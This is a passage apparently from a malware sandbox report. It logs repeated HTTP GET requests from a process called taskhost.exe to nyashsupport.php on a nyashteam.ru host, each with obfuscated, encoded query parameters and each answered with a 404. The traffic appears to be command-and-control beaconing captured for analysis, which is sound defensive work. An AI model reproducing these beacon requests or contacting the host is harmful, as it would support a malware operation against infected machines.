                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIxPqMu2oeGfXjfjLH5DFX3FBWe86AuOL1GAlrcl4qRKTGb8YVPjPGwHlk4NQ1rv2oW72b74tGOMNd5Am9cLN2DpR4S4RynPKGOx2abHvFTK0Z2Da940nqHKDisfI3XOQH6CMmpgJ1hreg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90eed64d78ef58-LHR
                                              alt-svc: h2=":443"; ma=60
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26464&min_rtt=26464&rtt_var=13232&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfbecg5nbsjG6jWMKbQOlr5nYBbJSYINDCDWYUFptoaFdr5IlSjCH3Auj6p3ArJ3n%2Bh1PGBkdUWgMWJzqsEeTkMviSV61Tg66vh8lblg6dnwEJXO8SQDIotl%2FwpDEP4dEiYBdn8eUMIW8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90eed738c3ef58-LHR
                                              alt-svc: h2=":443"; ma=60
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26632&min_rtt=26464&rtt_var=10261&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1021&recv_bytes=900&delivery_rate=97576&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nv6fK0kOtrsioUkqLIWPr2bkjDAJP4UlK%2BAQhFkzVaC5RM%2Fi0pgjxcQzxOfOiRws0Wi3Sq2wfMAmOWI5osTnVFdrvslP48Nx67en41hM5rqo8zxzIHvM17CbZNDtaHFI9YaDbL8lEIUm7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90ef38ff537749-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26363&min_rtt=26363&rtt_var=13181&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=684&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&cWcqJBXvGNzA9s0LWASh3cQmGlDfI5U=K5E&b7I6euMCALpgpiHencEAG0jh81=L2wzDoBtY2VCJPNm46g0&x0Zs1ErlXk7nIBJOWl2=yslSa5u2NplbBCXBWGMjT HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ew5ESZch%2F31pMmfLUbhfBXkDHgCv%2FzckOn%2Fk4OWTMPmntIKiIRPfjKzSx5u%2Ff6%2F%2B%2Fp2b4Z1E4ywcqgTaU5zY2PRNAoMPyAkV7fhK5IUiquXFZ%2B8wGuoiUI3bBImG4gcz6dCsJdRbtF0s2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90ef39d8687749-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26453&min_rtt=26363&rtt_var=10067&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1028&recv_bytes=1344&delivery_rate=100195&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eId23QDgyglBVgdQ3oVrofte3e%2B%2BxkcIXlXlqZ1wPtJv7G8VLsAq3qilxXw7ubdOPhz01Efl4D4qE93VXvUlHJ1it7t2o3HXmehFgTA1SHBpCf0tWBHj3%2FsXd2QyvLnIDRjRj%2BJ9IBUhTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90ef773fc76538-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&1gaaJcN3ugSAai=rk6&2MLCo2YptN7Sh7Mzd8gI3Ef9fRVB=RbCc1f HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ygoe1BCJ7a43t3BYs5Q4pYiZ8XU2rtaMBa8Jv2%2BbzkmaOKBgeF1x%2BqD20jIibpbSeG%2F3D2pbunUEbkjp1ibAZEoHAZeQW9g%2B%2B9pqL7z93bj%2FxCT29fAlGVHoypAn9X0UjZEC%2FOofkZjtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90ef7829606538-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26462&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1004&recv_bytes=1026&delivery_rate=100162&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMwxOlmcVBvAyRN2PwC5zQbpk33YzO%2B4gvVYXmi1hli3%2FG%2FRhHCGKFo2i6CYtoUd55pd%2FUhSEoj8tI504rwOq2Xri1tRYe7Ikp%2FnjNZL2P3xpEQ2Gafki%2FaCR01n2Zlw5lB0CNmq7lOlqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90efcfec9c93ff-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26348&min_rtt=26348&rtt_var=13174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=581&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&yoQf8QHV2QCfa=ehHhLG4JrmGy3o61v2x4bPiEeITX&jhYHMn=89xncp7oZJWdYAf&sgaP9DD=xhA HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:01:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gR63f42S10%2Bj0I%2F7Xrx4D88EdHw74X6%2FITrWUCIlfvftnMvUx8prJu7iacteEWPKRt3hHsG8ycVm68dYjt%2B6%2FlfIhDAncXcPplFqbe%2F96AnV%2BFMr23kTgPkIo70fEc8L9aLzcSKAuwpHFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90efd0cdae93ff-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26367&min_rtt=26348&rtt_var=9919&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1036&recv_bytes=1138&delivery_rate=102403&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pw0blR1k0hnxO7HDazNHlgv0zlyuKRyR3g5wUtW0cwawWo%2BGOwPzr1AfE%2FG1QQZGFZqQmkJu5bA9jq3CgIb22zJD1se7WjOfwPdnjETpPHJOMcMWJTJoOsYIYDP3%2BLEE0i7QrY0bkbktAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0173ad8bed2-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26082&min_rtt=26082&rtt_var=13041&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&4wJOoeGpHjHqZigHReQ=aoZ&pDwvPL97WzIRkR33Rx5zjb3SGo=lvmKQXVjksUa&jKUjZOh9kXwnsjOOJdpl0YLto24OsS=6W9QZGU HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2BpFWfoTxiAxsI%2B950BDm0N7TqiSZmdfDa%2BqDu3zS2qpZjyTjdJQCENsmKmeMHBVa9R57h59oLltME395J4emwNN2qmk3JKwQgVqMiItXFGVoDrTlv99RzwoRKwKUjaIXeRZks2NAe9dqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0188ceabed2-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26123&min_rtt=26082&rtt_var=9864&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1030&recv_bytes=1238&delivery_rate=102736&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ix6ltF1WwqVf0mBDC0glB9FYiOepBcrSv%2F4LttUur0JpcC8iJvVMUs9j4MtAWLYXmvUqrrqpvQf%2B4e3wp0tXtL6W0pEqG7w357F0YI2PTPV%2F0Q24CYTLGVk3w9zUm%2FPuwJY07I7FOyTrgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0694c154176-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26555&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
